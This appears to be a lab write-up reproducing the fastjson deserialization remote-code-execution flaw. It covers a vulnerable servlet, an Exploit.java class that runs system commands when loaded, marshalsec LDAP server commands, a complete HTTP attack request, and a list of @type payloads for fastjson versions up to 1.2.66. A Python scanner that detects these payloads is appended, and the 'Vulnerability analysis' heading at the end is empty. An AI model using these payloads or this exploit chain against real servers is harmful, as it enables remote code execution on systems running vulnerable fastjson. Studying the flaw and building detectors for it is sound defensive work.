FastJson deserialization vulnerability reproduction, with payloads for several versions
1. Setting up the vulnerable environment
- Open IDEA and create a new Java web project.
- Edit HelloServlet.java and put in the following code (the doPost method reads the raw request body and hands it straight to fastjson's JSON.parseObject, which is the vulnerable call):
import java.io.BufferedReader;
import java.io.IOException;
import javax.servlet.ServletException;          // use jakarta.servlet.* instead if the project targets Tomcat 10+
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import com.alibaba.fastjson.JSON;

// doPost of HelloServlet: collects the request body and parses it with fastjson
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    resp.setContentType("text/html");
    StringBuffer jb = new StringBuffer();
    String line = null;
    try {
        // read the body line by line into jb
        BufferedReader reader = req.getReader();
        while ((line = reader.readLine()) != null)
            jb.append(line);
        System.out.println(jb);
    } catch (Exception e) { /* report an error */ }
    try {
        // vulnerable sink: attacker-controlled JSON, @type is resolved by fastjson's autoType logic
        JSON.parseObject(String.valueOf(jb));
    } catch (Exception e) {
        e.printStackTrace();
    }
}
- fastjson is not on the classpath yet, so add the following dependency under <dependencies> in pom.xml:
<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.47</version>
</dependency>
Note: every time you switch fastjson versions, clear the Maven cache and reload the Maven project so the new jar is actually the one on the classpath; search online for how to clear it if you are unsure.
2. Setting up the attack environment
- Download the tools:
  marshalsec: https://github.com/mbechler/marshalsec
  phpstudy: https://www.xp.cn/
- Start the Apache service in phpstudy and create a file named Exploit.java in phpstudy's WWW directory. This is the code the target machine will execute; here it just pops a calculator as a demonstration:
// Exploit.java: served as Exploit.class over HTTP. The static initializer runs
// as soon as the target JVM loads the class through the JNDI reference.
public class Exploit {
    static {
        System.err.println("Pwned");
        try {
            // Windows target: pop calc. On Linux use e.g. {"/bin/sh", "-c", "..."}.
            String[] cmd = {"calc"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
- Compile it to a class file with javac from JDK 8 (the class file must be loadable by the target's JVM, so use a JDK no newer than the one running Tomcat):
javac Exploit.java
This leaves Exploit.class next to the source, reachable at http://127.0.0.1/Exploit.class.
- Build marshalsec with Maven: inside the marshalsec directory run
mvn clean package -DskipTests
When the build finishes, the jar appears in the target directory.
- Start the LDAP server, pointing it at the class hosted on Apache:
java -cp .\marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1/#Exploit"
It listens on port 1389 by default and answers every lookup with a reference to http://127.0.0.1/Exploit.class. Caveat: the target JVM must still allow remote class loading over LDAP; since JDK 8u191 (and 11.0.1) com.sun.jndi.ldap.object.trustURLCodebase defaults to false, so run Tomcat on an older build for this lab.
3. Attack steps
Using fastjson 1.2.47 as the example:
- Configure Tomcat in IDEA and run the project.
- When the deployment succeeds, the browser opens the application root; append /hello-servlet to the URL.
- Capture that request, change it to a POST, set Content-Type to application/json, and replace the body as shown below. The plain JdbcRowSetImpl payload (the x<=1.2.24 one in the list further down) is rejected by 1.2.47's denylist as long as autoTypeSupport is left at its default (off), so the 1.2.47 form is used: member "a" makes fastjson load com.sun.rowset.JdbcRowSetImpl through java.lang.Class, which leaves it in fastjson's class cache; member "b" then resolves the same name from that cache, skipping the denylist, and setting autoCommit makes JdbcRowSetImpl perform a JNDI lookup of dataSourceName, i.e. against the LDAP server started in step 2. Content-Length must match the body exactly:
POST /demo1_war_exploded/hello-servlet HTTP/1.1
Host: 192.168.43.73:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 184

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:1389/Exploit","autoCommit":true}}
- Send the request: a calculator pops up on the machine running Tomcat, and the marshalsec console logs the lookup it answered. The HTTP response tells you nothing either way, because the servlet catches and prints the exception.
Note: to try the payloads for other versions, change the fastjson version number in pom.xml and remember to clear the Maven cache and reload the project.
4. Payloads for each fastjson version
%s below is to be replaced with your RMI or LDAP URL; the version shown is the highest one each payload is known to work on. Two caveats apply to everything after 1.2.24: the bypasses only work when the application has switched autoTypeSupport on (ParserConfig.getGlobalInstance().setAutoTypeSupport(true)), the 1.2.47 payload being the exception that works with the default configuration; and a payload that names a third-party class needs that library on the target's classpath.
x<=1.2.24 (no autoType restriction exists yet, any @type is honoured):
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"%s","autoCommit":true}}
1.2.41 (autoTypeSupport on; the denylist sees the L...; descriptor form, which the class loader then strips):
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"%s", "autoCommit":true}
1.2.42 (autoTypeSupport on; the fix strips one L...; pair before checking, so a second pair gets through):
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"%s", "autoCommit":true}
1.2.43 (autoTypeSupport on; a leading [ loads the name as an array type and the [{, that follows makes the parser read the object as its element, so this body is deliberately not valid JSON):
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"%s", "autoCommit":true}
1.2.45 (autoTypeSupport on; needs MyBatis on the classpath):
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"%s"}}
1.2.47 (works with autoTypeSupport off; java.lang.Class loads the gadget into fastjson's class cache, which is consulted before the denylist):
{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"%s","autoCommit":true}}
1.2.62 (autoTypeSupport on; needs xbean-reflect on the classpath):
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"%s"}
1.2.66 (autoTypeSupport on; needs Apache Ignite on the classpath):
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"%s"}
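The defensive counterpart to the list above, as an added example that is not part of the original write-up: a scanner that runs over request bodies and flags the shapes these payloads take. It works on the raw text rather than a JSON parser, because the 1.2.43 body is intentionally malformed, and it undoes the L...; and [ spellings before comparing the class name. The gadget set is the one named in this list, the listener URL and the sample bodies are constructed for the demonstration, and the benign sample with a com.example.User type is an assumption.

```python
import json
import re

# Constructed gadget set: the JNDI-reaching classes named in the payload list above.
# Extend it with whatever else the application's classpath makes reachable.
JNDI_GADGETS = {
    "com.sun.rowset.JdbcRowSetImpl",
    "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
    "org.apache.xbean.propertyeditor.JndiConverter",
    "org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
}

TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]*)"')
VAL_RE = re.compile(r'"val"\s*:\s*"([^"]*)"')
JNDI_URL_RE = re.compile(r'\b(?:ldap|ldaps|rmi)://[^"\s]+', re.IGNORECASE)


def normalize_type_name(name):
    """Undo the spellings that slipped past the autoType denylist: a leading
    '[' (1.2.43, loaded as an array type) and one or more 'L...;' JVM
    descriptor wrappers (1.2.41 / 1.2.42)."""
    name = name.strip()
    while name.startswith("["):
        name = name[1:]
    while name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name


def analyze_body(body):
    """Return a list of findings for one request body (empty means nothing seen)."""
    findings = []
    for raw in TYPE_RE.findall(body):
        cls = normalize_type_name(raw)
        if cls in JNDI_GADGETS:
            findings.append("gadget @type %s (written as %r)" % (cls, raw))
        elif cls == "java.lang.Class":
            # 1.2.47 shape: java.lang.Class with val=<gadget> preloads the gadget
            # into fastjson's class cache before the real @type is resolved.
            for val in VAL_RE.findall(body):
                target = normalize_type_name(val)
                if target in JNDI_GADGETS:
                    findings.append("java.lang.Class cache preload of %s" % target)
    for url in JNDI_URL_RE.findall(body):
        findings.append("JNDI URL %s" % url)
    return findings


def is_valid_json(body):
    """True if a strict parser accepts the body; fastjson is more lenient."""
    try:
        json.loads(body)
        return True
    except ValueError:
        return False


# Constructed samples: the payload list above with a constructed listener URL,
# plus one benign (assumed) body that uses @type legitimately.
LISTENER = "ldap://10.0.0.5:1389/Exploit"
SAMPLES = {
    "<=1.2.24": '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"%s","autoCommit":true}}' % LISTENER,
    "1.2.41": '{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"%s", "autoCommit":true}' % LISTENER,
    "1.2.42": '{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"%s", "autoCommit":true}' % LISTENER,
    "1.2.43": '{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"%s", "autoCommit":true}' % LISTENER,
    "1.2.45": '{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"%s"}}' % LISTENER,
    "1.2.47": '{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"%s","autoCommit":true}}' % LISTENER,
    "1.2.62": '{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"%s"}' % LISTENER,
    "1.2.66": '{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"%s"}' % LISTENER,
    "benign": '{"@type":"com.example.User","name":"alice","email":"alice@example.com"}',
}


def scan_samples():
    """Map each sample label to its findings."""
    return {label: analyze_body(body) for label, body in SAMPLES.items()}


if __name__ == "__main__":
    for label, found in scan_samples().items():
        print("%-8s valid_json=%-5s %s" % (label, is_valid_json(SAMPLES[label]), found or "clean"))
```

Any @type at all in input from an untrusted client is worth logging; this scanner only raises the cases that reach JNDI, and a WAF-style filter built from it must not rely on the JSON being well formed, as the 1.2.43 sample shows.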
5. Vulnerability analysis